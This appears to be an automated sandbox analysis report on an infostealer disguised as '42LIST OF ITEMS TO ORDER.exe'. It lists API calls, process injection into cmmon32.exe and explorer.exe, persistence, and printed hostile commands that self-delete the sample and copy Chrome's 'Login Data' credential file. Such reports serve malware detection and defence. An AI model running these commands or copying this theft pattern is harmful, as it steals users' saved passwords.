Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA540 NtDelayExecution,LdrInitializeThunk,3_2_00EEA540
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA6A0 NtCreateSection,LdrInitializeThunk,3_2_00EEA6A0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA610 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00EEA610
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA750 NtCreateFile,LdrInitializeThunk,3_2_00EEA750
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA720 NtResumeThread,LdrInitializeThunk,3_2_00EEA720
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA700 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00EEA700
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEB0B0 NtGetContextThread,3_2_00EEB0B0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA800 NtSetValueKey,3_2_00EEA800
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA2F0 NtQueryInformationFile,3_2_00EEA2F0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA2D0 NtClose,3_2_00EEA2D0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA260 NtWriteFile,3_2_00EEA260
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA220 NtWaitForSingleObject,3_2_00EEA220
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEBA30 NtSetContextThread,3_2_00EEBA30
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA3D0 NtCreateKey,3_2_00EEA3D0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA370 NtQueryInformationProcess,3_2_00EEA370
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA350 NtQueryValueKey,3_2_00EEA350
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA310 NtEnumerateValueKey,3_2_00EEA310
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEACE0 NtCreateMutant,3_2_00EEACE0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA4A0 NtUnmapViewOfSection,3_2_00EEA4A0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA470 NtSetInformationFile,3_2_00EEA470
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEB470 NtOpenThread,3_2_00EEB470
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA430 NtQueryVirtualMemory,3_2_00EEA430
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEB410 NtOpenProcessToken,3_2_00EEB410
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA410 NtQueryInformationToken,3_2_00EEA410
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA5A0 NtWriteVirtualMemory,3_2_00EEA5A0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEBD40 NtSuspendThread,3_2_00EEBD40
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA520 NtEnumerateKey,3_2_00EEA520
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA6D0 NtCreateProcessEx,3_2_00EEA6D0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA650 NtQueueApcThread,3_2_00EEA650
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA780 NtOpenDirectoryObject,3_2_00EEA780
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA710 NtQuerySection,3_2_00EEA710
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_003D6B50 NtCreateFile,3_2_003D6B50
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_003D6C00 NtReadFile,3_2_003D6C00
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_003D6D30 NtAllocateVirtualMemory,3_2_003D6D30
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_003D6B4A NtCreateFile,3_2_003D6B4A
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_003D6BFA NtReadFile,3_2_003D6BFA
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_003D6C7A NtReadFile,3_2_003D6C7A
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_003D6C4A NtReadFile,3_2_003D6C4A
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA470 NtSetInformationFile,LdrInitializeThunk,6_2_043BA470
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA460 NtOpenProcess,LdrInitializeThunk,6_2_043BA460
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA480 NtMapViewOfSection,LdrInitializeThunk,6_2_043BA480
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BACE0 NtCreateMutant,LdrInitializeThunk,6_2_043BACE0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA560 NtQuerySystemInformation,LdrInitializeThunk,6_2_043BA560
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BBD40 NtSuspendThread,LdrInitializeThunk,6_2_043BBD40
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA540 NtDelayExecution,LdrInitializeThunk,6_2_043BA540
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA5F0 NtReadVirtualMemory,LdrInitializeThunk,6_2_043BA5F0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA610 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_043BA610
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA6A0 NtCreateSection,LdrInitializeThunk,6_2_043BA6A0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA750 NtCreateFile,LdrInitializeThunk,6_2_043BA750
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA800 NtSetValueKey,LdrInitializeThunk,6_2_043BA800
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA260 NtWriteFile,LdrInitializeThunk,6_2_043BA260
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA240 NtReadFile,LdrInitializeThunk,6_2_043BA240
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA310 NtEnumerateValueKey,LdrInitializeThunk,6_2_043BA310
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA360 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_043BA360
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA350 NtQueryValueKey,LdrInitializeThunk,6_2_043BA350
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA3E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_043BA3E0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA3D0 NtCreateKey,LdrInitializeThunk,6_2_043BA3D0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA430 NtQueryVirtualMemory,6_2_043BA430
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA410 NtQueryInformationToken,6_2_043BA410
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BB410 NtOpenProcessToken,6_2_043BB410
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BB470 NtOpenThread,6_2_043BB470
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA4A0 NtUnmapViewOfSection,6_2_043BA4A0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA520 NtEnumerateKey,6_2_043BA520
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA5A0 NtWriteVirtualMemory,6_2_043BA5A0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA650 NtQueueApcThread,6_2_043BA650
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA6D0 NtCreateProcessEx,6_2_043BA6D0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA720 NtResumeThread,6_2_043BA720
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA710 NtQuerySection,6_2_043BA710
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA700 NtProtectVirtualMemory,6_2_043BA700
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA780 NtOpenDirectoryObject,6_2_043BA780
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BB0B0 NtGetContextThread,6_2_043BB0B0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BBA30 NtSetContextThread,6_2_043BBA30
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA220 NtWaitForSingleObject,6_2_043BA220
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA2F0 NtQueryInformationFile,6_2_043BA2F0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA2D0 NtClose,6_2_043BA2D0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043BA370 NtQueryInformationProcess,6_2_043BA370
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_00C16B50 NtCreateFile,6_2_00C16B50
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_00C16C00 NtReadFile,6_2_00C16C00
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_00C16D30 NtAllocateVirtualMemory,6_2_00C16D30
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_00C16BFA NtReadFile,6_2_00C16BFA
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_00C16B4A NtCreateFile,6_2_00C16B4A
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_00C16C4A NtReadFile,6_2_00C16C4A
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_00C16C7A NtReadFile,6_2_00C16C7A
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_00416B50 NtCreateFile,19_2_00416B50
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_00416C00 NtReadFile,19_2_00416C00
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_00416D30 NtAllocateVirtualMemory,19_2_00416D30
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_00416B4A NtCreateFile,19_2_00416B4A
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_00416BFA NtReadFile,19_2_00416BFA
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_00416C4A NtReadFile,19_2_00416C4A
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_00416C7A NtReadFile,19_2_00416C7A
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_0193A3E0 NtFreeVirtualMemory,LdrInitializeThunk,19_2_0193A3E0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_0193A360 NtAllocateVirtualMemory,LdrInitializeThunk,19_2_0193A360
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_0193A240 NtReadFile,LdrInitializeThunk,19_2_0193A240
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_0193A5F0 NtReadVirtualMemory,LdrInitializeThunk,19_2_0193A5F0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_0193A540 NtDelayExecution,LdrInitializeThunk,19_2_0193A540
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_0193A560 NtQuerySystemInformation,LdrInitializeThunk,19_2_0193A560
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_0193A480 NtMapViewOfSection,LdrInitializeThunk,19_2_0193A480
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_0193A460 NtOpenProcess,LdrInitializeThunk,19_2_0193A460
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_0193A700 NtProtectVirtualMemory,LdrInitializeThunk,19_2_0193A700
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_0193A720 NtResumeThread,LdrInitializeThunk,19_2_0193A720
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_0193A750 NtCreateFile,LdrInitializeThunk,19_2_0193A750
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A6A0 NtCreateSection,LdrInitializeThunk,19_2_0193A6A0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A610 NtAdjustPrivilegesToken,LdrInitializeThunk,19_2_0193A610
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193B0B0 NtGetContextThread,19_2_0193B0B0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A800 NtSetValueKey,19_2_0193A800
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A3D0 NtCreateKey,19_2_0193A3D0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A310 NtEnumerateValueKey,19_2_0193A310
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A350 NtQueryValueKey,19_2_0193A350
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A370 NtQueryInformationProcess,19_2_0193A370
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A2D0 NtClose,19_2_0193A2D0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A2F0 NtQueryInformationFile,19_2_0193A2F0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193BA30 NtSetContextThread,19_2_0193BA30
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A220 NtWaitForSingleObject,19_2_0193A220
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A260 NtWriteFile,19_2_0193A260
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A5A0 NtWriteVirtualMemory,19_2_0193A5A0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A520 NtEnumerateKey,19_2_0193A520
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193BD40 NtSuspendThread,19_2_0193BD40
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A4A0 NtUnmapViewOfSection,19_2_0193A4A0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193ACE0 NtCreateMutant,19_2_0193ACE0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A410 NtQueryInformationToken,19_2_0193A410
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193B410 NtOpenProcessToken,19_2_0193B410
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A430 NtQueryVirtualMemory,19_2_0193A430
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A470 NtSetInformationFile,19_2_0193A470
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193B470 NtOpenThread,19_2_0193B470
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A780 NtOpenDirectoryObject,19_2_0193A780
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A710 NtQuerySection,19_2_0193A710
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A6D0 NtCreateProcessEx,19_2_0193A6D0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A650 NtQueueApcThread,19_2_0193A650
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:744:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_01
Detected potential crypto functionShow sources
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: String function: 00EAB0E0 appears 176 times
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: String function: 00EFDDE8 appears 48 times
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: String function: 00F35110 appears 38 times
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: String function: 00C11AA0 appears 66 times
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: String function: 01985110 appears 40 times
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: String function: 018FB0E0 appears 176 times
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: String function: 0194DDE8 appears 49 times
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: String function: 00C14150 appears 40 times
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 0437B0E0 appears 168 times
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 043CDDE8 appears 34 times
PE file contains executable resources (Code or Archives)
Source: 42LIST OF ITEMS TO ORDER.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: px7426l3fbx.exe.5.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
PE file contains strange resources
Source: 42LIST OF ITEMS TO ORDER.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: px7426l3fbx.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts file
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\cmmon32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample file is different than original file name gathered from version info
Source: 42LIST OF ITEMS TO ORDER.exe, 00000000.00000003.6490550404.00000000027BF000.00000004.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 42LIST OF ITEMS TO ORDER.exe
Source: 42LIST OF ITEMS TO ORDER.exe, 00000000.00000001.6462771156.0000000000C81000.00000002.sdmp | Binary or memory string: OriginalFilenameSamalla.exe2 vs 42LIST OF ITEMS TO ORDER.exe
Source: 42LIST OF ITEMS TO ORDER.exe, 00000003.00000000.6482451627.0000000000C81000.00000002.sdmp | Binary or memory string: OriginalFilenameSamalla.exe2 vs 42LIST OF ITEMS TO ORDER.exe
Source: 42LIST OF ITEMS TO ORDER.exe, 00000003.00000002.6638023768.0000000000F9F000.00000040.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 42LIST OF ITEMS TO ORDER.exe
Source: 42LIST OF ITEMS TO ORDER.exe, 00000003.00000002.6633348061.00000000003F0000.00000040.sdmp | Binary or memory string: OriginalFilenameCMMON32.exe` vs 42LIST OF ITEMS TO ORDER.exe
Searches the installation path of Mozilla Firefox
Source: C:\Windows\SysWOW64\cmmon32.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
Tries to load missing DLLs
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Section loaded: wow64log.dll
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wow64log.dll
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Section loaded: wow64log.dll
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Section loaded: wow64log.dll
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Section loaded: wow64log.dll
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: wow64log.dll
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Section loaded: wow64log.dll
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: wow64log.dll
Binary contains paths to development resources
Source: explorer.exe, 00000005.00000000.6551355975.0000000009916000.00000004.sdmp | Binary or memory string: .sln}4k
Classification label
Source: classification engine | Classification label: mal100.spyw.evad.winEXE@272/8@6/2
Creates files inside the user directory
Source: C:\Windows\SysWOW64\cmmon32.exe | File created: C:\Users\user\AppData\Roaming\77P6C7R2
Creates temporary files
Source: C:\Windows\explorer.exe | File created: C:\Users\CRAIGH~1\AppData\Local\Temp\Eobzxyvuh
Launches a second explorer.exe instance
Source: unknown | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
PE file has an executable .text section and no other executable section
Source: 42LIST OF ITEMS TO ORDER.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini files
Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe 'C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe'
Source: unknown | Process created: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe 'C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown | Process created: C:\Windows\System32\consent.exe consent.exe 992 272 0000022382FBE480
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\CRAIGH~1\AppData\Local\Temp\DB1' /V
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown | Process created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe
Source: unknown | Process created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe 'C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe'
Source: unknown | Process created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe
Source: unknown | Process created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe 'C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown | Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: unknown | Process created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe 'C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe'
Source: unknown | Process created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe 'C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\autoconv.exe unknown
Source: unknown | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Process created: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe 'C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\explorer.exe | Process created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe
Source: C:\Windows\explorer.exe | Process created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe 'C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: C:\Windows\explorer.exe | Process created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe 'C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autoconv.exe unknown
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe'
Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\CRAIGH~1\AppData\Local\Temp\DB1' /V
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Process created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Process created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe 'C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe'
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeProcess created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe 'C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe' Jump to behavior
Uses an in-process (OLE) Automation server
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32
Writes ini files
Source: C:\Windows\SysWOW64\cmmon32.exe | File written: C:\Users\user\AppData\Roaming\77P6C7R2\77Plogri.ini
Checks if Microsoft Office is installed
Source: C:\Windows\SysWOW64\cmmon32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: 42LIST OF ITEMS TO ORDER.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
